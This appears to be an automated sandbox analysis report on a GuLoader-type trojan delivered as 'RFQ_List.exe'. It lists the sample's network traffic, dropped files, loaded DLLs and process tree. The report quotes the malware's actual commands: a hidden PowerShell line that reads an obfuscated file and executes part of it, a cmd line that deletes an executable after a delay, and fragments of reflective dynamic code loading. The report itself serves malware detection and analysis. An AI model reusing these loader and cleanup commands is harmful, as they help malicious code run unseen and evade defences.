Source: msiexec.exe, 00000006.00000003.2470214716.000000000946B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 51954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51967
Source: unknown	Network traffic detected: HTTP traffic on port 51979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51954
Source: unknown	Network traffic detected: HTTP traffic on port 52026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51979
Source: unknown	Network traffic detected: HTTP traffic on port 52004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51960
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52015
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52026
Source: unknown	Network traffic detected: HTTP traffic on port 51917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51907
Source: unknown	Network traffic detected: HTTP traffic on port 51907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51960 -> 443

Source: unknown	HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:51907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:51917 version: TLS 1.2

Source: C:\Users\user\Desktop\RFQ_List.exe

Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052F3

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ_List.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\RFQ_List.exe

Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004032A0

Source: C:\Users\user\Desktop\RFQ_List.exe	File created: C:\Windows\resources\Nebengeschfter.ini	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	File created: C:\Windows\Fonts\thyrididae.ini	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_00404B30	0_2_00404B30
Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_00407041	0_2_00407041
Source: C:\Users\user\Desktop\RFQ_List.exe	Code function: 0_2_0040686A	0_2_0040686A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CADE58	1_2_04CADE58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0782CAB6	1_2_0782CAB6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6C470	6_2_24E6C470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6C751	6_2_24E6C751
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6C190	6_2_24E6C190
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6B328	6_2_24E6B328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6BEB0	6_2_24E6BEB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E64AD9	6_2_24E64AD9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6CA31	6_2_24E6CA31
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6BBD2	6_2_24E6BBD2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6B4F2	6_2_24E6B4F2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6C481	6_2_24E6C481
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E63570	6_2_24E63570
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6B501	6_2_24E6B501
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6C761	6_2_24E6C761
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6C1A1	6_2_24E6C1A1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6BEC1	6_2_24E6BEC1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E66880	6_2_24E66880
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E69858	6_2_24E69858
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E64AE9	6_2_24E64AE9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6CA41	6_2_24E6CA41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_24E6BBE1	6_2_24E6BBE1

Source: RFQ_List.exe

Static PE information: invalid certificate

Source: RFQ_List.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@11/20@4/4

Source: C:\Users\user\Desktop\RFQ_List.exe

0_2_004032A0

Source: C:\Users\user\Desktop\RFQ_List.exe

Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045B4

Source: C:\Users\user\Desktop\RFQ_List.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\RFQ_List.exe

File created: C:\Users\user\AppData\Local\peritonealizing

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03

Source: C:\Users\user\Desktop\RFQ_List.exe

File created: C:\Users\user\AppData\Local\Temp\nsk7302.tmp

Jump to behavior

Source: RFQ_List.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\RFQ_List.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ_List.exe	ReversingLabs: Detection: 66%
Source: RFQ_List.exe	Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\RFQ_List.exe

File read: C:\Users\user\Desktop\RFQ_List.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ_List.exe "C:\Users\user\Desktop\RFQ_List.exe"
Source: C:\Users\user\Desktop\RFQ_List.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Users\user\Desktop\RFQ_List.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\System32\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Damascenere.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\ProgramData\Polyhistorisk\fagbladsjournalistens.ugi

Source: C:\Users\user\Desktop\RFQ_List.exe

File written: C:\Windows\Resources\Nebengeschfter.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: RFQ_List.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbt N source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: em.Core.pdb source: powershell.exe, 00000001.00000002.2347740691.0000000008742000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2337305741.000000000764B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2349116146.0000000009279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Stegerserne $Proving $Pasformen), (Disa @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Kassevognenes = [AppDomain]::CurrentDomain.GetAssemblies()$global:s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Doleritterne)), $Computerkriminalitet).DefineDynamicModule($sovepudens, $false).DefineType($Kyllingemoren230, $tabardillo, [System.Mul

Suspicious powershell command line found

Source: C:\Users\user\Desktop\RFQ_List.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"
Source: C:\Users\user\Desktop\RFQ_List.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Noncuriousness=Get-Content -raw 'C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Maidenliness.Hal37';$Objektiviserende=$Noncuriousness.SubString(53938,3);.$Objektiviserende($Noncuriousness)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CACA78 push eax; mov dword ptr [esp], edx	1_2_04CACA8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CAD610 push esp; iretd	1_2_04CAD611
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04CAD098 pushad ; retf	1_2_04CAD0B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_07821CF5 pushfd ; retf	1_2_07821D45
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0782DAD3 push eax; ret	1_2_0782DAED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_091049DC push 8BD68B50h; retf	1_2_091049F4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_09104549 push 8BD38B50h; iretd	1_2_0910454E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_091047CD push 8B0600A1h; iretd	1_2_091047D2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes\RFQ_List.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
